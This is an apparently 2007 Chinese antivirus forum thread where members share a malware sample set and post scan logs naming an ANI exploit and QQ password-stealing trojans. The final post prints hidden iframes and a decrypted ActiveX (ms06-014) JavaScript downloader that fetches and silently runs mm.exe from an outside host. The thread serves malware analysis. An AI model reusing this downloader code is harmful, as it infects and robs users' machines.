刚回来，发毒王一个

lanvin

hxxp://1.avddd.com

The EQs

等人发样本

beat2

5个拉，带生成物system32.jmp、~tmp.tmp、System64.sys

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\5.zip'
C:\Documents and Settings\morgan\My Documents\
  5.zip
    [0] Archive type: ZIP
    --> 1[1].gif
        [DETECTION] Contains signature of the exploits EXP/Ani.Gen
        [WARNING]   Infected files in archives cannot be repaired!
    --> mm[1].exe
        [DETECTION] Contains suspicious code HEUR/Malware
        [WARNING]   Infected files in archives cannot be repaired!
    --> system32.jmp
        [DETECTION] Contains suspicious code HEUR/Malware
        [WARNING]   Infected files in archives cannot be repaired!
    --> System64.sys
        [DETECTION] Contains suspicious code HEUR/Malware
        [WARNING]   Infected files in archives cannot be repaired!
    --> ~tmp.tmp
        [DETECTION] Contains suspicious code HEUR/Malware
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!

The EQs

Scan performed at: 2007-5-11 14:04:47
Scanning Log
NOD32 version 2256 (20070510) NT
Command line: C:\Documents and Settings\EQ2\桌面\5.zip
Operating memory - is OK

Date: 11.5.2007  Time: 14:04:52
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\5.zip
C:\Documents and Settings\EQ2\桌面\5.zip ?ZIP ?1[1].gif - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\5.zip ?ZIP ?mm[1].exe - probably a variant of Win32/PSW.QQPass.VD trojan
C:\Documents and Settings\EQ2\桌面\5.zip ?ZIP ?system32.jmp - probably a variant of Win32/PSW.QQPass.VD trojan
C:\Documents and Settings\EQ2\桌面\5.zip ?ZIP ?System64.sys - probably a variant of Win32/PSW.QQPass.VD trojan
C:\Documents and Settings\EQ2\桌面\5.zip ?ZIP ?~tmp.tmp - probably a variant of Win32/PSW.QQPass.VD trojan
Number of scanned files: 6
Number of threats found: 5
Number of files cleaned: 1
Time of completion: 14:04:52 Total scanning time: 0 sec (00:00:00)

lanvin

原帖由 beat2 于 2007-5-11 14:03 发表
5个拉，带生成物system32.jmp、~tmp.tmp、System64.sys

多谢

aribeth199

咖啡报5个，1个光标，4个木马。

solcroft

avast!漏一个... .sys文件，不玩了

wangjay1980

detected: malware Exploit.Win32.IMG-ANI.gen (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\5.zip/1[1].gif
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\5.zip/mm[1].exe
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\5.zip/system32.jmp
detected: virus Downloader (modification)        File: C:\Documents and Settings\Owner\×ÀÃæ\5.zip/~tmp.tmp

dikex

<iframe src="http://cc.wzxqy.com/tt/index.htm" width="20" height="0" frameborder="0"></iframe>
<iframe src="http://cc.wzxqy.com/wm/index.htm" width="20" height="0" frameborder="0"></iframe>

第一个里面有http://cc.wzxqy.com/tt/1.gif

第二个里面的http://cc.wzxqy.com/wm/1.js经过解密得：
function gn(n){var number=Math.random()*n;return'~tmp'+'.tmp'}try{dl='http://cc.wzxqy.com/wm/mm.exe';var df=document.createElement("object");df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P","");var S=df.CreateObject("Adodb.Stream","");S.type=1;x.open("GET",dl,0);x.send();fname1=gn(10000);var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder(0);fname1=F.BuildPath(tmp,fname1);S.Open();S.Write(x.responseBody);S.SaveToFile(fname1,2);S.Close();var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+fname1,"","open",0)}catch(i){i=1}

和上面的ani一样挂了http:\\cc.wzxqy.com/tt/mm.exe，最近的都是ani+ms06-014